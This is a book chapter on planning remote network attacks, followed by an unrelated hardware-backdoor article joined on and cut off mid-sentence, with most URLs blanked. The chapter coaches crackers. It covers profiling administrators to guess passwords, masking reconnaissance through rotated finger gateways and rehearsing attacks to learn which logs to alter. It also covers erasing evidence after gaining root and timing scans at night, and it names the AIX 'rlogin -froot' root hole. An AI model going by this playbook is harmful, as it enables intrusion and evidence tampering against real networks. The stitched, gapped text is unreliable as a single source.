The Remote Attack

What Is a Remote Attack?

A remote attack is any attack that is initiated against a machine that the attacker does not currently have control over; that is, it is an attack against any machine other than the attacker’s own (whether that machine is on the attacker’s subnet or 10,000 miles away). The best way to define a remote machine is this:

A remote machine is any machine–other than the one you are now on–that can be reached through some protocol over the Internet or any other network or medium.

The First Steps

The first steps, oddly enough, do not involve much contact with the target. (That is, they won’t if the cracker is smart.) The cracker’s first problem (after identifying the type of network, the target machines, and so on) is to determine with whom he is dealing. Much of this information can be acquired without disturbing the target. (We will assume for now that the target does not run a firewall. Most networks do not. Not yet, anyway.) Some of this information is gathered through the following techniques:

  • Running a host query. Here, the cracker gathers as much information as is currently held on the target in domain servers. Such a query may produce volumes of information (remember the query on Boston University in Chapter 9, “Scanners”?) or may reveal very little. Much depends on the size and the construct of the network.
  • For example, under optimal circumstances of examining a large and well-established target, this will map out the machines and IPs within the domain in a very comprehensive fashion. The names of these machines may give the cracker a clue as to what names are being used in NIS (if applicable). Equally, the target may turn out to be a small outfit, with only two machines; in that case, the information will naturally be sparse. It will identify the name server and the IPs of the two boxes (little more than one could get from a WHOIS query). One interesting note is that the type of operating system can often be discerned from such a query.
  • A WHOIS query. This will identify the technical contacts. Such information may seem innocuous. It isn’t. The technical contact is generally the person at least partially responsible for the day-to-day administration of the target. That person’s e-mail address will have some value. (Also, between this and the host query, you can determine whether the target is a real box, a leaf node, a virtual domain hosted by another service, and so on.)
  • Running some Usenet and Web searches. There are a number of searches the cracker might want to conduct before actually coming into contact with the target. One is to run the technical contact’s name through a search engine (using a forced, case-sensitive, this-string-only conditional search). The cracker is looking to see if the administrators and technical contacts sport much traffic in Usenet. Similarly, this address (or addresses) should be run through searchable archives of all applicable security mailing lists.

The techniques mentioned in this list may seem superfluous until you understand their value. Certainly, Farmer and Venema would agree on this point:

What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don’t stop there–you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find.


Cross Reference: The preceding paragraph is excerpted from Improving the Security of Your Site by Breaking Into It by Dan Farmer and Wietse Venema. It can be found online at

Collecting information about the system administrator is paramount. A system administrator is usually responsible for maintaining the security of a site. There are instances where the system administrator may run into problems, and many of them cannot resist the urge to post to Usenet or mailing lists for answers to those problems. By taking the time to run the administrator’s address (and any variation of it, as I will explain in the next section), you may be able to gain greater insight into his network, his security, and his personality. Administrators who make such posts typically specify their architecture, a bit about their network topology, and their stated problem.

Even evidence of a match for that address (or lack thereof) can be enlightening. For example, if a system administrator is in a security mailing list or forum each day, disputing or discussing various security techniques and problems with fellow administrators, this is evidence of knowledge. In other words, this type of person knows security well and is therefore likely well prepared for an attack. Analyzing such a person’s posts closely will tell you a bit about his stance on security and how he implements it. Conversely, if the majority of his questions are rudimentary (and he often has a difficult time grasping one or more security concepts), it might be evidence of inexperience.

From a completely different angle, if his address does not appear at all on such lists or in such forums, there are only a few possibilities why. One is that he is lurking through such groups. The other is that he is so bad-ass that he has no need to discuss security at all. (Basically, if he is on such lists at all, he DOES receive advisories, and that is, of course, a bad sign for the cracker, no matter what way you look at it. The cracker has to rely in large part on the administrator’s lack of knowledge. Most semi-secure platforms can be relatively secure even with a minimal effort by a well-trained system administrator.)

In short, these searches make a quick (and painless) attempt to cull some important information about the folks at the other end of the wire.

You will note that I referred to “any variation” of a system administrator’s address. Variations in this context mean any possible alternate addresses. There are two kinds of alternate addresses. The first kind is the individual’s personal address. That is, many system administrators may also have addresses at or on networks other than their own. (Some administrators are actually foolish enough to include these addresses in the fields provided for address on an InterNIC record.) So, while they may not use their work address to discuss (or learn about) security, it is quite possible that they may be using their home address.

To demonstrate, I once cracked a network located in California. The administrator of the site had an account on AOL. The account on AOL was used in Usenet to discuss various security issues. By following this man’s postings through Usenet, I was able to determine quite a bit. In fact (and this is truly extraordinary), his password, I learned, was the name of his daughter followed by the number 1.

The other example of a variation of an address is this: either the identical address or an address assigned to that person’s same name on any machine within his network. Now, let’s make this a little more clear. First, on a network that is skillfully controlled, no name is associated with root. That is because root should be used as little as possible and viewed as a system ID, not to be invoked unless absolutely necessary. (In other words, because su and perhaps other commands or devices exist that allow an administrator to do his work, root need not be directly invoked, except in a limited number of cases.)


NOTE: Attacking a network run on Windows NT is a different matter. In those cases, you are looking to follow root (or rather, Administrator) on each box. The design of NT makes this a necessity, and Administrator on NT is vastly different from root on a UNIX box.

Because root is probably not invoked directly, the system administrator’s ID could be anything. Let’s presume here that you know that ID. Let’s suppose it is walrus. Let us further suppose that on the host query that you conducted, there are about 150 machines. Each of those machines has a distinct name. For example, there might be,,,, and so forth. (Although, in practice, they will more likely have “theme” names that obscure what the machine actually does, like,, and

The cracker should try the administrator’s address on each machine. Thus, he will be trying,, and so forth. (This is what I refer to as a variation on a target administrator’s address.) In other words, try this on each box on the network, as well as run all the general diagnostic stuff on each of these machines. Perhaps walrus has a particular machine that he favors, and it is from this machine that he does his posting.

Here’s an interesting note: If the target is a provider (or other system that one can first gain legitimate access to), you can also gain an enormous amount of information about the system administrator simply by watching where he is coming in from. This, to some extent, can be done from the outside as well, with a combination of finger and rusers. In other words, you are looking to identify foreign networks (that is, networks other than the target) on which the system administrator has accounts. Obviously, if his last login was from Netcom, he has an account on Netcom. Follow that ID for a day or so and see what surfaces.

About Finger Queries

In the previously referenced paper by Farmer and Venema (a phenomenal and revolutionary document in terms of insight), one point is missed: The use of the finger utility can be a dangerous announcement of your activities. What if, for example, the system administrator is running MasterPlan?


TIP: MasterPlan is a utility I discuss in Chapter 13, “Techniques to Hide One’s Identity.” Its function is to trap and log all finger queries directed to the user; that is, MasterPlan will identify the IP of the party doing the fingering, the time that such fingering took place, the frequency of such fingering, and so forth. It basically attempts to gather as much information about the person fingering you as possible. Also, it is not necessary that they use MasterPlan. The system administrator might easily have written his own hacked finger daemon, one that perhaps even traces the route back to the original requesting party–or worse, fingers them in return.

To avoid the possibility of their finger queries raising any flags, most crackers use finger gateways. Finger gateways are Web pages, and they usually sport a single input field that points to a CGI program on the drive of the remote server that performs finger lookup functions. In Figure 25.1, I have provided an example of one such finger gateway. (This one is located at the University of Michigan Medical Center.)

FIGURE 25.1.
An example of a finger gateway at the University of Michigan.

By using a finger gateway, the cracker can obscure his source address. That is, the finger query is initiated by the remote system that hosts the finger gateway. (In other words, not the cracker’s own machine but some other machine.) True, an extremely paranoid system administrator might track down the source address of that finger gateway; he might even contact the administrator of the finger gateway site to have a look at the access log there. In this way, he could identify the fingering party. That this would happen, however, is quite unlikely, especially if the cracker staggers his gateways. In other words, if the cracker intends to do any of this type of work “by hand,” he should really do each finger query from a different gateway. Because there are 3,000+ finger gateways currently on the Web, this is not an unreasonable burden. Furthermore, if I were doing the queries, I would set them apart by several minutes (or ideally, several hours).


NOTE: One technique involves the redirection of a finger request. This is where the cracker issues a raw finger request to one finger server, requesting information from another. This is referred to as forwarding a finger request. The syntax of such a command is finger For example, if you wanted to finger a user at, you might use‘s finger service to forward the request. However, in today’s climate, most system administrators have finger forwarding turned off.

The Operating System

You may have to go through various methods (including but not limited to those described in the preceding section) to identify the operating system and version being used on the target network. In earlier years, one could be pretty certain that the majority of machines on a target network ran similar software on similar hardware. Today, it is another ball game entirely. Today, networks may harbor dozens of different machines with disparate operating systems and architecture. One would think that for the cracker, this would be a hostile and difficult-to-manage environment. Not so.

The more diverse your network nodes are (in terms of operating system and architecture), the more likely it is that a security hole exists. There are reasons for this, and while I do not intend to explain them thoroughly, I will relate at least this: Each operating system has its own set of bugs. Some of these bugs are known, and some may be discovered over time. In a relatively large network, where there may be many different types of machines and software, you have a better chance of finding a hole. The system administrator is, at day’s end, only a human being. He cannot be constantly reviewing security advisories for each platform in turn. There is a strong chance that his security knowledge of this or that system is weak.

In any event, once having identified the various operating systems and architectures available at the target, the next step is study. A checklist should be made that lists each operating system and machine type. This checklist will assist you tremendously as you go to the next step, which is to identify all known holes on that platform and understand each one.


NOTE: Some analysts might make the argument that tools like ISS and SATAN will identify all such holes automatically and, therefore, research need not be done. This is erroneous, for several reasons. First, such tools may not be complete in their assessment. Here is why: Although both of the tools mentioned are quite comprehensive, they are not perfect. For example, holes emerge each day for a wide range of platforms. True, both tools are extensible, and one can therefore add new scan modules, but the scanning tools that you have are limited to the programmer’s knowledge of the holes that existed at the time of the coding of the application. 

Therefore, to make a new scanning module to be added to these extensible and malleable applications, you must first know that such new holes exist. Second, and perhaps more importantly, simply knowing that a hole exists does not necessarily mean that you can exploit it–you must first understand it. (Unless, of course, the hole is an obvious and self-explanatory one, such as the -froot rlogin problem on some versions of the AIX operating system. By initiating an rlogin session with the -froot flags, you can gain instant privileged access on many older AIX-based machines.) For these reasons, hauling off and running a massive scan is a premature move.

To gather this information, you will need to visit a few key sites. The first such site you need to visit is the firewalls mailing list archive page.


Cross Reference: The firewalls mailing list archive page can be found online at

You may initially wonder why this list would be of value, because the subject discussed is firewall-related. (Remember, we began this chapter with the presumption that the target was not running a firewall.) The firewalls list archive is valuable because it is often used–over the objections of many list members–to discuss other security-related issues. Another invaluable source of such data is BUGTRAQ, which is a searchable archive of known vulnerabilities on various operating systems (though largely UNIX.)


Cross Reference: BUGTRAQ is located online at

These searchable databases are of paramount importance. A practical example will help tremendously at this point. Suppose that your target is a machine running AIX. First, you would go to the ARC Searchable WAIS Gateway for DDN and CERT advisories.


Cross Reference: The ARC Searchable WAIS Gateway for DDN and CERT advisories can be found online at

At this stage, you can begin to do some research. After reading the initial advisory, if there is no more information than a simple description of the vulnerability, do not despair. You just have to go to the next level. The next phase is a little bit more complex. After identifying the most recent weakness (and having read the advisory), you must extract from that advisory (and all that follow it) the commonly used, often abbreviated, or “jargon,” name for the hole. For example, after a hole is discovered, it is often referred to by security folks with a name that may not reflect the entire problem. (An example would be “the Linux telnetd problem” or “AIX’s froot hole” or some other, brief term by which the hole becomes universally identified.) The extraction process is quickly done by taking the ID number of the advisory and running it through one of the abovementioned archives like BUGTRAQ or Firewalls. Here is why:

Typically, when a security professional posts either an exploit script, a tester script (tests to see if the hole exists) or a commentary, they will almost always include complete references to the original advisory. Thus, you will see something similar to this in their message: Here's a script to test if you are vulnerable to the talkd problem talked about in CA-97.04..

This message is referring to CERT Advisory number 97.04, which was first issued on January 27, 1997. By using this number as a search expression, you will turn up all references to it. After reading 10 or 12 results from such a search, you will know what the security crowd is calling that hole. After you have that, you can conduct an all-out search in all legitimate and underground database sources to get every shred of information about the hole. You are not looking for initial postings in particular, but subsequent, trailing ones. (Some archives have an option where you can specify a display by thread; these are preferred. This allows you to see the initial posting and all subsequent postings about that original message; that is, all the “re:” follow-ups.) However, some search engines do not provide for an output in threaded form; therefore, you will simply have to rake through them by hand.

The reason that you want these follow-ups is because they usually contain exploit or test scripts (programs that automatically test or simulate the hole). They also generally contain other technical information related to the hole. For example, one security officer might have found a new way to implement the vulnerability, or might have found that an associated program (or include file or other dependency) may be the real problem or even a great contributor to the hole. The thoughts and reflections of these individuals are pure gold, particularly if the hole is a new one. These individuals are actually doing all the work for you: analyzing and testing the hole, refining attacks against it, and so forth.


TIP: Many exploit and test scripts are posted in standard shell or C language and are therefore a breeze to either reconfigure for your own system or compile for your architecture. In most instances, only minimal work has to be done to make them work on your platform.

So, to this point, you have defined a portion (or perhaps all) of the following chief points:

  • Who the administrator is
  • The machines on the network, and perhaps their functions and domain servers
  • Their operating systems
  • Their probable holes
  • Any discussion by the administrator about the topology, management, policies, construction, or administration of the network

Now you can proceed to the next step.

One point of interest: It is extremely valuable if you can also identify machines that may be co-located. This is, of course, strictly in cases where the target is an Internet service provider (ISP). ISPs often offer deals for customers to co-locate a machine on their wire. There are certain advantages to this for the customer. One of them is cost. If the provider offers to co-locate a box on its T3 for, say, $600 a month, this is infinitely less expensive than running a machine from your own office that hooks into a T1. A T1 runs about $900-$1,200 monthly. You can see why co-location is popular: You get speeds far faster for much less money and headache. For the ISP, it is nothing more than plugging a box into its Ethernet system. Therefore, even setup and administration costs are lower. And, perhaps most importantly of all, it takes the local telephone company out of the loop. Thus, you cut even more cost, and you can establish a server immediately instead of waiting six weeks.

These co-located boxes may or may be not be administrated by the ISP. If they are not, there is an excellent chance that these boxes may either have (or later develop) holes. This is especially likely if the owner of the box employs a significant amount of CGI or other self-designed program modules that the ISP has little or no control over. By compromising that box, you have an excellent chance of bringing the entire network under attack, unless the ISP has purposefully strung the machine directly to its own router, a hub (or instituted some other procedure of segmenting the co-located boxes from the rest of the network.)


NOTE: This can be determined to some degree using traceroute or whois services. In the case of traceroute, you can identify the position of the machine on the wire by examining the path of the traced route. In a whois query, you can readily see whether the box has its own domain server or whether it is using someone else’s (an ISP’s).

Doing a Test Run

The test-run portion of the attack is practical only for those individuals who are serious about cracking. Your average cracker will not undertake such activity, because it involves spending a little money. However, if I were counseling a cracker, I would recommend it.

This step involves establishing a single machine with the identical distribution as the target. Thus, if the target is a SPARCstation 2 running Solaris 2.4, you would erect an identical machine and string it to the Net via any suitable method (by modem, ISDN, Frame Relay, T1, or whatever you have available). After you have established the machine, run a series of attacks against it. There are two things you are looking for:

  • What the attacks are going to look like from the attacking side
  • What the attacks will look like from the victim’s side

There are a number of reasons for this, and some are not so obvious. In examination of the logs on the attacking side, the cracker can gain an idea of what the attack should look like if his target is basically unprotected–in other words, if the target is not running custom daemons. This provides the cracker a little road map to go by; certainly, if his ultimate scan and attack of the target do not look nearly identical, this is cause for concern. All things being equal, an identically configured machine (or, I should say, an apparently identically configured machine) should respond identically. If it does not, the folks at the target have something up their sleeve. In this instance, the cracker would be wise to tread carefully.

By examining the victim-side logs, the cracker can get a look at what his footprint will look like. This is also important to know. On diverse platforms, there are different logging procedures. The cracker should know at a minimum exactly what these logging procedures are; that is, he needs to know each and every file (on the identically configured machine) that will show evidence of an intrusion. This information is paramount, because it serves as a road map also: It shows him exactly what files have to be altered to erase any evidence of his attack. The only way to identify these files for certain is to conduct a test under a controlled environment and examine the logs for themselves.

In actual attacks, there should be only a few seconds (or minutes at most) before root (or some high level of privilege) is obtained. Similarly, it should be only seconds thereafter (or minutes at worst) before evidence of that intrusion is erased. For the cracker, any other option is a fatal one. They may not suffer from it in the short run, but in the long run, they will end up in handcuffs.

This step is not as expensive as you would think. There are newsgroups (most notably, where one can obtain the identical machine (or a close facsimile) for a reasonable price. Generally, the seller of such a machine will load a full version of the operating system “for testing purposes only.” This is their way of saying “I will give you the operating system, which comes without a license and therefore violates the license agreement. If you keep it and later come under fire from the vendor, you are on your own.”

Even licensed resellers will do this, so you can end up with an identical machine without going to too much expense. (You can also go to defense contracting firms, many of which auction off their workstations for a fraction of their fair market value. The only bar here is that you must have the cash ready; you generally only get a single shot at a bid.)

Other possibilities include having friends set up such a box at their place of work or even at a university. All you really need are the logs. I have always thought that it would be a good study practice to maintain a database of such logs per operating system per attack and per scanner–in other words, have a library of what such attacks look like, given the aforementioned variables. This, I think, would be a good training resource for new system administrators, something like “This is what a SS4 looks like when under attack by someone using ISS. These are the log files you need to look for and this is how they will appear.”

Surely, a script could be fashioned (perhaps an automated one) that would run a comparative analysis against the files on your workstation. This process could be done once a day as a cron job. It seems to me that at least minimal intrusion-detection systems could be designed this way. Such tools do exist, but have been criticized by many individuals because they can be “fooled” too easily. There is an excellent paper that treats this subject, at least with respect to SunOS. It is titled USTAT: A Real Time Intrusion Detection System for UNIX. (This paper was, in fact, a thesis for the completion of a master’s in computer science at the University of Santa Barbara, California. It is very good.) In the abstract, the author writes:

In this document, the development of the first USTAT prototype, which is for SunOS 4.1.1, is described. USTAT makes use of the audit trails that are collected by the C2 Basic Security Module of SunOS, and it keeps track of only those critical actions that must occur for the successful completion of the penetration. This approach differs from other rule-based penetration identification tools that pattern match sequences of audit records.


Cross Reference: The preceding paragraph is excerpted from USTAT: A Real Time Intrusion Detection System for UNIX by Koral Ilgun. It can be found online at

Although we proceeded under the assumption that the target network was basically an unprotected, out-of-the-box install, I thought I should mention tools like the one described in the paper referenced previously. The majority of such tools have been employed on extremely secure networks–networks often associated with classified or even secret or top-secret work.

Another interesting paper lists a few of these tools and makes a brief analysis of each. It discusses how

Computer security officials at the system level have always had a challenging task when it comes to day-to-day mainframe auditing. Typically the auditing options/features are limited by the mainframe operating system and other system software provided by the hardware vendor. Also, since security auditing is a logical subset of management auditing, some of the available auditing options/features may be of little value to computer security officials. Finally, the relevant auditing information is probably far too voluminous to process manually and the availability of automated data reduction/analysis tools is very limited. Typically, 95% of the audit data is of no security significance. The trick is determining which 95% to ignore.


Cross Reference: The previous paragraph is excerpted from Summary of the Trusted Information Systems (TIS) Report on Intrusion Detection Systems, prepared by Victor H. Marshall, Systems Assurance Team Leader, Booz, Allen & Hamilton Inc. This document can be found online at

In any event, this “live” testing technique should be primarily employed where there is a single attack point. Typical situations are where you suspect that one of the workstations is the most viable target (where perhaps the others will refuse all connections from outside the subnet and so forth). Obviously, I am not suggesting that you erect an exact model of the target network; that could be cost and time prohibitive. What I am suggesting is that in coordination of a remote attack, you need to have (at a minimum) some idea of what is supposed to happen. Simulating that attack on a host other than the target is a wise thing to do. Otherwise, there is no guarantee that you can even marginally ensure that the data you receive back has some integrity. Bellovin’s paper on Berferd should be a warning to any cracker that a simulation of a vulnerable network is not out of the question. In fact, I have wondered many times why security technologies have not focused entirely on this type of technique, especially since scanners have become so popular.

What is the difficulty in a system administrator creating his own such system on the fly? How difficult would it be for an administrator to write custom daemons (on a system where the targeted services aren’t even actually running) that would provide the cracker with bogus responses? Isn’t this better than announcing that you have a firewall (or TCP_WRAPPER), therefore alerting the attacker to potential problems? Never mind passive port-scanning utilities, let’s get down to the nitty-gritty: This is how to catch a cracker–with a system designed exclusively for the purpose of creating logs that demonstrate intent. This, in my opinion, is where some new advances ought to be made. These types of systems offer automation to the process of evidence gathering.

The agencies that typically utilize such tools are few. Mostly, they are military organizations. An interesting document is available on the Internet in regard to military evaluations and intrusion detection. What is truly interesting about the document is the flair with which it is written. For instance, sample this little excerpt:

For 20 days in early spring 1994, Air Force cybersleuths stalked a digital delinquent raiding unclassified computer systems at Griffiss AFB, NY. The investigators had staked out the crime scene–a small, 12-by-12-foot computer room in Rome Laboratory’s Air Development Center–for weeks, surviving on Jolt cola, junk food and naps underneath desks. Traps were set by the Air Force Information Warfare Center to catch the bandit in the act, and `silent’ alarms sounded each time their man slinked back to survey his handiwork. The suspect, who dubbed himself `Data Stream,’ was blind to the surveillance, but despite this, led pursuers on several high-speed chases that don’t get much faster–the speed of light. The outlaw was a computer hacker zipping along the ethereal lanes of the Internet, and tailing him was the information superhighway patrol–the Air Force Office of Special Investigations computer crime investigations unit.


Cross Reference: The previous paragraph is excerpted from “Hacker Trackers: OSI Computer Cops Fight Crime On-Line” by Pat McKenna. It can be found online at

The document doesn’t give as much technical information as one would want, but it is quite interesting, all the same. Probably a more practical document for the legal preservation of information in the investigation of intrusions is one titled “Investigating and Prosecuting Network Intrusions.” It was authored by John C. Smith, Senior Investigator in the Computer Crime Unit of the Santa Clara County District Attorney’s Office.


Cross Reference: “Investigating and Prosecuting Network Intrusions” can be found online at

In any event, as I have said, at least some testing should be done beforehand. That can only be done by establishing a like box with like software.

Tools: About Holes and Other Important Features

Next, you need to assemble the tools you will actually use. These tools will most probably be scanners. You will be looking (at a minimum) to identify all services now running on the target. Based on your analysis of the operating system (as well as the other variables I’ve mentioned in this chapter), you will need to evaluate your tools to determine what areas or holes they do not cover.

In instances where a particular service is covered by one tool but not another, it is best to integrate the two tools together. The ease of integration of such tools will depend largely on whether these tools can simply be attached as external modules to a scanner like SATAN or SAFESuite. Again, here the use of a test run can be extremely valuable; in most instances, you cannot simply attach an external program and have it work flawlessly.

To determine the exact outcome of how all these tools will work in concert, it is best to do this at least on some machine (even if it is not identical to the target). That is because, here, we are concerned with whether the scan will be somehow interrupted or corrupted as the result of running two or more modules of disparate design. Remember that a real-time scanning attack should be done only once. If you screw it up, you might not get a second chance.

So, you will be picking your tools (at least for the scan) based on what you can reasonably expect to find at the other end. In some cases, this is an easy job. For example, perhaps you already know that someone on the box is running X Window System applications across the Net. (Not bloody likely, but not unheard of.) In that case, you will also be scanning for xhost problems, and so it goes.

Remember that a scanner is a drastic solution. It is the equivalent of running up to an occupied home with a crowbar in broad daylight, trying all the doors and windows. If the system administrator is even moderately tuned into security issues, you have just announced your entire plan.


TIP: There are some measures you can take to avoid that announcement, but they are drastic: You can actually institute the same security procedures that other networks do, including installing software (sometimes a firewall and sometimes not) that will refuse to report your machine’s particulars to the target. There are serious problems with this type of technique, however, as they require a high level of skill. (Also, many tools will be rendered useless by instituting such techniques. Some tools are designed so that one or more functions require the ability to go out of your network, through the router, and back inside again.)

Again, however, we are assuming here that the target is not armored; it’s just an average site, which means that we needn’t stress too much about the scan. Furthermore, as Dan Farmer’s recent survey suggests, scanning may not be a significant issue anyway. According to Farmer (and I have implicit faith in his representations, knowing from personal experience that he is a man of honor), the majority of networks don’t even notice the traffic:

…no attempt was made to hide the survey, but only three sites out of more than two thousand contacted me to inquire what was going on when I performed the unauthorized survey (that’s a bit over one in one thousand questioning my activity). Two were from the normal survey list, and one was from my random group.


Cross Reference: The preceding paragraph is excerpted from the introduction of Shall We Dust Moscow? by Dan Farmer. This document can be found online at

That scan involved over 2,000 hosts, the majority of which were fairly sensitive sites (for example, banks). You would expect that these sites would be ultra-paranoid, filtering every packet and immediately jumping on even the slightest hint of a scan.

Developing an Attack Strategy

The days of roaming around the Internet, cracking this and that server are basically over. Years ago, compromising the security of a system was viewed as a minor transgression as long as no damage was done. Today, the situation is different. Today, the value of data is becoming an increasingly talked-about issue. Therefore, the modern cracker would be wise not to crack without a reason. Similarly, he would be wise to set forth cracking a server only with a particular plan.

The only instance in which this does not apply is where the cracker is either located in a foreign state that has no specific law against computer intrusion (Berferd again) or one that provides no extradition procedure for that particular offense (for example, the NASA case involving a student in Argentina). All other crackers would be wise to tread very cautiously.

Your attack strategy may depend on what you are wanting to accomplish. We will assume, however, that the task at hand is basically nothing more than compromise of system security. If this is your plan, you need to lay out how the attack will be accomplished. The longer the scan takes (and the more machines that are included within it), the more likely it is that it will be immediately discovered. Also, the more scan data that you have to sift through, the longer it will take to implement an attack based upon that data. The time that elapses between the scan and the actual attack, as I’ve mentioned, should be short.

Some things are therefore obvious (or should be). If you determine from all of your data collection that certain portions of the network are segmented by routers, switches, bridges, or other devices, you should probably exclude those from your scan. After all, compromising those systems will likely produce little benefit. Suppose you gained root on one such box in a segment. How far do you think you could get? Do you think that you could easily cross a bridge, router, or switch? Probably not. Therefore, sniffing will only render relevant information about the other machines in the segment, and spoofing will likewise work (reliably) only against those machines within the segment. Because what you are looking for is root on the main box (or at least, within the largest network segment available), it is unlikely that a scan on smaller, more secure segments would prove to be of great benefit.


NOTE: Of course, if these machines (for whatever reason) happen to be the only ones exposed, by all means, attack them (unless they are completely worthless). For example, it is a common procedure to place a Web server outside the network firewall or make that machine the only one accessible from the void. Unless the purpose of the exercise is to crack the Web server (and cause some limited, public embarrassment to the owners of the Web box), why bother? These machines are typically “sacrificial” hosts–that is, the system administrator has anticipated losing the entire machine to a remote attack, so the machine has nothing of import upon its drives. Nothing except Web pages, that is.

In any event, once you have determined the parameters of your scan, implement it.

A Word About Timing Scans

When should you implement a scan? The answer to this is really “never.” However, if you are going to do it, I would do it late at night relative to the target. Because it is going to create a run of connection requests anyway (and because it would take much longer if implemented during high-traffic periods), I think you might as well take advantage of the graveyard shift. The shorter the time period, the better off you are.

After the Scan

After you have completed the scan, you will be subjecting the data to analysis. The first issue you want to get out of the way is whether the information is even authentic. (This, to some degree, is established from your sample scans on a like machine with the like operating system distribution.)

Analysis is the next step. This will vary depending upon what you have found. Certainly, the documents included in the SATAN distribution can help tremendously in this regard. Those documents (tutorials about vulnerabilities) are brief, but direct and informative. They address the following vulnerabilities:

  • FTP vulnerabilities
  • NFS export to unprivileged programs
  • NFS export via portmapper
  • NIS password file access
  • REXD access
  • SATAN password disclosure
  • Sendmail vulnerabilities
  • TFTP file access
  • Remote shell access
  • Unrestricted NFS export
  • Unrestricted X server access
  • Unrestricted modem
  • Writeable FTP home directory

In addition to these pieces of information, you should apply any knowledge that you have gained through the process of gathering information on the specific platform and operating system. In other words, if a scanner reports a certain vulnerability (especially a newer one), you should refer back to the database of information that you have already built from raking BUGTRAQ and other searchable sources.

This is a major point: There is no way to become either a master system administrator or a master cracker overnight. The hard truth is this: You may spend weeks studying source code, vulnerabilities, a particular operating system, or other information before you truly understand the nature of an attack and what can be culled from it. Those are the breaks. There is no substitute for experience, nor is there a substitute for perseverance or patience. If you lack any of these attributes, forget it.

That is an important point to be made here. Whether we are talking about individuals like Kevin Mitnik (cracker) or people like Weitse Venema (hacker), it makes little difference. Their work and their accomplishments have been discussed in various news magazines and online forums. They are celebrities within the Internet security (and in some cases, beyond). However, their accomplishments (good or bad) resulted from hard work, study, ingenuity, thought, imagination, and self-application. Thus, no firewall will save a security administrator who isn’t on top of it, nor will SATAN help a newbie cracker to unlawfully breach the security of a remote target. That’s the bottom line.


Remote attacks are becoming increasingly common. As discussed in several earlier chapters, the ability to run a scan has become more within the grasp of the average user. Similarly, the proliferation of searchable vulnerability indexes have greatly enhanced one’s ability to identify possible security issues.

Some individuals suggest that the free sharing of such information is itself contributing to the poor state of security on the Internet. That is incorrect. Rather, system administrators must make use of such publicly available information. They should, technically, perform the procedures described here on their own networks. It is not so much a matter of cost as it is time.

One interesting phenomenon is the increase in tools to attack Windows NT boxes. Not just scanning tools, either, but sniffers, password grabbers, and password crackers. In reference to remote attack tools, though, the best tool available for NT is SAFEsuite by Internet Security Systems (ISS). It contains a wide variety of tools, although the majority were designed for internal security analysis.

For example, consider the Intranet Scanner, which assesses the internal security of a network tied to a Microsoft Windows NT server. Note here that I write only that the network is tied to the NT server. This does not mean that all machines on the network must run NT in order for the Intranet Scanner to work. Rather, it is designed to assess a network that contains nodes of disparate architecture and operating systems. So, you could have boxes running Windows 95, UNIX, or potentially other operating systems running TCP/IP. The title of the document is “Security Assessment in the Windows NT Environment: A White Paper for Network Security Professionals.” It discusses the many features of the product line and a bit about Windows NT security in general.


Cross Reference: To get a better idea of what Intranet Scanner offers, check out

Specific ways to target specific operating systems (as in “How To” sections) are beyond the scope of this book, not because I lack the knowledge but because it could take volumes to relate. To give you a frame of reference, consider this: The Australian CERT (AUSCERT) UNIX Security Checklist consists of at least six pages of printed information. The information is extremely abbreviated and is difficult to interpret by anyone who is not well versed in UNIX. Taking each point that AUSCERT raises and expanding it into a detailed description and tutorial would likely create a 400-page book, even if the format contained simple headings such as Daemon, Holes, Source, Impact, Platform, Examples, Fix, and so on. (That document, by the way, discussed elsewhere in this book, is the definitive list of UNIX security vulnerabilities. It is described in detail in Chapter 17, “UNIX: The Big Kahuna.”)

In closing, a well-orchestrated and formidable remote attack is not the work of some half-cocked cracker. It is the work of someone with a deep understanding of the system–someone who is cool, collected, and quite well educated in TCP/IP. (Although that education may not have come in a formal fashion.) For this reason, it is a shame that crackers usually come to such a terrible end. One wonders why these talented folks turn to the dark side.

I know this, though: It has nothing to do with money. There are money-oriented crackers, and they are professionals. But the hobbyist cracker is a social curiosity–so much talent and so little common sense. It is extraordinary, really, for one incredible reason: It was crackers who spawned most of the tools in this book. Their activities gave rise to the more conventional (and more talented) computing communities that are coding special security applications. Therefore, the existence of specialized tools is really a monument to the cracking community. They have had a significant impact, and one such impact was the development of the remote attack. The technique not only exists because of these curious people, but also grows in complexity because of them. 


Hacking deeper in the system

Hacking deeper in the system   

1.  Abstract
     Today, we're observing a growing number of papers focusing on hardware
hacking. Even if hardware-based backdoors are far from being a good
solution to use in the wild, this topic is very important as some big
corporations are planning to take control of our computers without our
consent using some really bad designed concepts such as DRM and TCPA.
As we can't let them do this at any cost, the time has come for a little
introduction to the hardware world...
     This paper constitutes a tiny introduction to hardware hacking in the
backdoor writers perspective (hey, this is phrack, I'm not going to explain
how to pilot your coffee machine with a RS232 interface). The thing is
even if backdooring hardware isn't a so good idea, it is a good way to
start in hardware hacking. The aim of the author is to give readers the
basis of hardware hacking which should be usefull to prepare for the fight
against TCPA and other crappy things sponsored by big sucke... erm...
"companies" such as Sony and Microsoft.
     This paper is i386 centric. It does not cover any other architecture,
but it can be used as a basis on researches about other hardware. Thus
bear in mind that most of the material presented here won't work on any
other machine than a PC. Subjects such as devices, BIOS and internal work
of a PC will be discussed and some ideas about turning all these things to
our own advantage will be presented.
     This paper IS NOT an ad nor a presentation of some 3v1L s0fTw4r3,     
so you won't find a fully functionnal backdoor here. The aim of the author
is to provide information that would help you in writing your own stuff,
not to provide you with an already done work. This subject isn't a
particularly difficult one, all it just takes is immagination.
     In order to understand this article, some knowledge about x86 assembly
and architecture is heavily recommended. If you're a newbie to these
subjects, I strongly recommend you to read "The Art of Assembly
Programming" (see [1]).
2.  A quick introduction to I/O system
     Before digging straight into the subject, some explanations must be
done. Those of you who already know how I/O works on Intel's and what
they're here for might just prefer to skip to the next section. Others,
just keep on reading. 
     As this paper focuses on hardware, it would be practical to know how
to access it. The I/O system provides such an access. As everybody knows,
the processor (CPU) is the heart, or, more accurately, the brain of the
computer. But the only thing it does is to compute. Basically, a CPU isn't
of much help without devices. Devices give data to be computed to the CPU,
and allow it to bring back an answer to our requests. The I/O system is
used to link most of devices to the CPU. The way processors see I/O based
devices is quite the same as the way they see memory. In fact, all the
processors do to communicate with devices is to read and write data
"somewhere in memory" : the I/O system is charged to handle the next steps.
This "somewhere in memory" is represented by an I/O port. I/O ports are
special "addresses" that connects the CPU data bus to the device. Each I/O
based device uses at least one I/O port, many of them using several. 
Basically, the only thing device drivers do is to manipulate I/O ports
(well, very basically, that's what they do, just to communicate with
hardware). The Intel Architecture provides three main ways to manipulate
